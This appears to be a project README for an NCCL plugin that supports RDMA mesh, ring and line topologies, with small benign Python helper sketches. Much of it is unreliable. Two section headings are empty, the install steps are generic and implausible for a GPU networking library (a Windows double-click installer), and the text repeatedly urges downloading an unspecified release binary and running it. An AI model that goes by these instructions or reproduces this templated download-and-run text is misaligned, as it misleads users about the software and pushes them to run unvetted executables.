mrpottermusic

🚀 nccl-mesh-plugin - Effortless Distributed Machine Learning

Download Latest Release

📖 Overview

The NCCL Mesh Plugin lets NCCL communicate efficiently across direct-connect RDMA mesh topologies. Unlike standard NCCL plugins, it also works when nodes sit in different subnets. It supports several topologies, so you can set up a distributed machine learning environment without complex networking solutions.
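
To make the "different subnets" point concrete, here is a minimal sketch of how a node could pick the right local interface for each peer. It assumes every direct cable is configured as its own small /30 subnet; the node names, the addresses, and the helper `local_address_for_peer` are made up for illustration and are not part of the plugin.

```python
import ipaddress

# Hypothetical addressing for three directly cabled nodes: every
# point-to-point link gets its own /30 subnet (illustrative values only).
NODE_INTERFACES = {
    "node-a": ["10.0.1.1/30", "10.0.2.1/30"],
    "node-b": ["10.0.1.2/30", "10.0.3.1/30"],
    "node-c": ["10.0.2.2/30", "10.0.3.2/30"],
}


def local_address_for_peer(local_node, peer_ip):
    """Return the local address that shares a subnet with peer_ip, or None."""
    peer = ipaddress.ip_address(peer_ip)
    for cidr in NODE_INTERFACES[local_node]:
        iface = ipaddress.ip_interface(cidr)
        if peer in iface.network:
            return str(iface.ip)
    return None


if __name__ == "__main__":
    # node-a reaches node-b and node-c over two different subnets.
    print(local_address_for_peer("node-a", "10.0.1.2"))
    print(local_address_for_peer("node-a", "10.0.2.2"))
```

No single subnet contains all three nodes in this layout, which is the situation the overview describes.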

🌐 Supported Topologies
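
The configuration steps name three topology values: full mesh, ring, and line. As a rough illustration of how they differ, the sketch below lists the direct links each one implies for a given number of nodes. The function `topology_links` is a hypothetical helper, not the plugin's API.

```python
from itertools import combinations


def topology_links(topology, node_count):
    """Return the direct links, as pairs of node indices, for a topology."""
    if topology == "full mesh":
        # Every node is cabled to every other node.
        return list(combinations(range(node_count), 2))
    if topology == "line":
        # Each node is cabled only to its next neighbour.
        return [(i, i + 1) for i in range(node_count - 1)]
    if topology == "ring":
        # A line whose last node is cabled back to the first.
        links = [(i, i + 1) for i in range(node_count - 1)]
        if node_count > 2:
            links.append((node_count - 1, 0))
        return links
    raise ValueError(f"unknown topology: {topology!r}")


if __name__ == "__main__":
    for name in ("full mesh", "ring", "line"):
        print(name, topology_links(name, 4))
```

With three nodes, full mesh and ring need the same three cables; the difference only appears from four nodes up.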

🔧 Tested Configuration

This plugin has been tested with three DGX Spark workstations connected by 100 Gbps direct RDMA links. The test workload was distributed LLM training of the Qwen2.5-14B model with DeepSpeed ZeRO.


🚀 Getting Started

Follow these steps to download and run the NCCL Mesh Plugin:

  1. Visit the Download Page
    Click the link below to go to the Releases page of this repository.
    Download NCCL Mesh Plugin

  2. Select the Latest Release
    Look for the section labeled “Latest Release.” It usually appears at the top of the page. Ensure it is the most recent version.

  3. Download the Plugin
    Find the plugin file that matches your operating system (Windows, Linux, etc.) and click the download link related to that file. Save it to your computer.

  4. Install the Plugin
    After the file has downloaded, locate it on your computer. Depending on your operating system, installation procedures may vary:
    • For Windows: Double click the file and follow the prompts.
    • For Linux: Use your terminal to navigate to the file location and run the installer with the command ./installation-file.

  5. Set Up Your Environment
    Ensure that your machine has the following requirements to run the plugin efficiently:
    • OS: Windows 10 or later, or a compatible Linux distribution.
    • NVIDIA Drivers: Install the latest versions for optimal performance.
    • NCCL Support: Ensure you have NCCL set up prior to using this plugin.
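
A quick way to review these prerequisites is sketched below. It only reports what it finds on the host and does not verify driver or NCCL versions. Looking up the library under the name `nccl` is an assumption about how NCCL is installed on your system, and `check_environment` is a hypothetical helper.

```python
import ctypes.util
import platform
import shutil


def check_environment():
    """Collect basic facts about the host; versions are not verified."""
    return {
        # "Linux", "Windows", or another platform name.
        "os": platform.system(),
        # nvidia-smi ships with the NVIDIA driver, so its presence is a hint.
        "nvidia_smi_found": shutil.which("nvidia-smi") is not None,
        # Name of the NCCL shared library if the loader can find it, else None.
        "nccl_library": ctypes.util.find_library("nccl"),
    }


if __name__ == "__main__":
    for key, value in check_environment().items():
        print(f"{key}: {value}")
```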

📥 Download & Install

You can download the NCCL Mesh Plugin directly from our Releases page. Here is the link for quick access:
Download NCCL Mesh Plugin

Once you download the file, follow the installation steps outlined above to set everything up.


🛠️ System Requirements

The NCCL Mesh Plugin requires certain hardware and software specifications for optimal use:


⚙️ Configuration

After installation, you may need to configure the plugin. Follow these steps:

  1. Open the Configuration File
    Navigate to the plugin directory and open the configuration file named config.toml.

  2. Edit Topology Settings
    Modify the settings to match your specific network topology. You can set it to “full mesh”, “ring”, or “line”.

  3. Save Changes
    Make sure to save your changes before exiting the file.

  4. Run the Plugin
    Start your distributed ML training environment as you normally would, ensuring the NCCL Mesh Plugin is included in your command.
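
For step 4, NCCL generally selects an external network plugin through the `NCCL_NET_PLUGIN` environment variable, and `NCCL_DEBUG=INFO` makes it log which network it loaded. The sketch below builds such an environment for a launcher process. The plugin name `"mesh"` is an assumption; check the release you downloaded for the actual name. `build_launch_env` is a hypothetical helper.

```python
import os


def build_launch_env(plugin_name, base_env=None):
    """Return a copy of the environment with NCCL plugin settings added."""
    env = dict(os.environ if base_env is None else base_env)
    # Tells NCCL which external network plugin to load (name is an assumption).
    env["NCCL_NET_PLUGIN"] = plugin_name
    # Makes NCCL log its initialization, including the selected network.
    env["NCCL_DEBUG"] = "INFO"
    return env


if __name__ == "__main__":
    env = build_launch_env("mesh")
    print(env["NCCL_NET_PLUGIN"], env["NCCL_DEBUG"])
```

The returned mapping can be passed as `env=` to `subprocess.run` when starting your usual training launcher.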


📞 Support

If you encounter any issues or have questions regarding installation or configuration, feel free to reach out. You can open an issue on the GitHub repository, and our team will be happy to assist you.


For further details and updates, always refer back to our Releases page.